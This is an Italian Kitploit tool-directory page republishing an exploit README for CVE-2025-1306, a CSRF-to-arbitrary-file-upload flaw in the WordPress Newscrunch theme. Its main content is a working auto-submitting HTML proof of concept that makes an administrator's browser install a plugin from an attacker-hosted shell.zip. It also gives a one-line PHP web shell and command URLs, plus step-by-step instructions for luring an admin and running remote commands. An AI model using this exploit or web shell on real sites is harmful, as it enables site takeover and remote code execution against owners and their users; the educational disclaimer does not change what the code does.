Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-1306 — Newscrunch <= 1.8.4 - Cross-Site Request Forgery per Caricamento Arbitrario di File | Kitploit
Strumenti/GitHubGitHub/nxploited/cve-2025-1306
Strumenti di PhishingGenerazione di PayloadExploitSfruttamento di Applicazioni WebApprendimento e Formazione
GitHubnxploited/cve-2025-1306

CVE-2025-1306

Newscrunch <= 1.8.4 - Cross-Site Request Forgery per Caricamento Arbitrario di File

Vedi Repository
51 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Newscrunch Exploit (CVE-2025-1306)

🚨 Panoramica

Questo exploit prende di mira una vulnerabilità di Cross-Site Request Forgery (CSRF) verso upload arbitrario di file (CVE-2025-1306) nel tema WordPress Newscrunch. A causa della mancata validazione nonce nella funzione newscrunch_install_and_activate_plugin(), un attaccante non autenticato può indurre un amministratore autenticato a caricare file arbitrari sul server, consentendo l'esecuzione remota di codice (RCE).


🔥 Dettagli della vulnerabilità

  • CVE ID: CVE-2025-1306
  • Software interessato: Tema WordPress Newscrunch (<= 1.8.4)
  • Classificazione CWE: CWE-352 - Cross-Site Request Forgery (CSRF)
  • Punteggio CVSS: 8.8 (ALTO)
  • Vettore: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
  • Data di pubblicazione: 4 marzo 2025

🛑 Gravità e impatto

  • ✅ Esecuzione remota di codice (RCE)
  • ✅ Compromissione totale del sistema
  • ✅ Upload arbitrario di file basato su CSRF
  • ✅ Vettore d'attacco non autenticato

Sfruttabilità: richiede che un amministratore visiti un collegamento dannoso appositamente creato.


📜 Codice Exploit

Questo exploit costringe un amministratore autenticato a eseguire un attacco CSRF che carica un file ZIP malevolo contenente una web shell.

🔹 PoC - Exploit HTML

root@kitploit:~
<!DOCTYPE html>
<html>
<head>
    <title>CSRF Exploit CVE-2025-1306 By Nxploit ,Khaled AlEnazi</title>
</head>
<body>
    <h2>Click anywhere to load content...</h2>

    <script>
        function sendExploit() {
            var form = document.createElement("form");
            form.method = "POST";
            form.action = "http://target.com/wp-admin/admin-ajax.php?action=newscrunch_install_activate_plugin";

            var input = document.createElement("input");
            input.type = "hidden";
            input.name = "plugin_url";
            input.value = "http://attacker.com/shell.zip";

            form.appendChild(input);
            document.body.appendChild(form);
            form.submit();
        }

        
        window.onload = function() {
            sendExploit();
        };
    </script>
</body>
</html>

📌 Sostituisci:

  • http://target.com/ con il sito WordPress vulnerabile
  • http://attacker.com/shell.zip con un payload ZIP malevolo contenente una web shell.

🔹 Esempio di shell PHP malevola

root@kitploit:~
<?php system($_GET['cmd']); ?>

📌 Dopo lo sfruttamento riuscito, accedi alla shell:

root@kitploit:~
http://target.com/wp-content/plugins/shell.php?cmd=whoami

🚀 Come usare

  1. Ospita il file HTML su un sito web controllato dall'attaccante.
  2. Invia il collegamento dannoso a un amministratore WordPress autenticato.
  3. Una volta che l'amministratore visita la pagina, la shell viene caricata automaticamente.
  4. Esegui comandi da remoto usando:
    root@kitploit:~
    http://target.com/wp-content/plugins/shell.php?cmd=ls
    

⚠️ Disclaimer

Questo strumento è destinato esclusivamente a scopi educativi e di ricerca sulla sicurezza. Lo sfruttamento non autorizzato delle vulnerabilità è illegale e punibile per legge. L'autore non è responsabile per qualsiasi uso improprio o danno causato da questo strumento. Usalo in modo responsabile.


Scarica lo strumento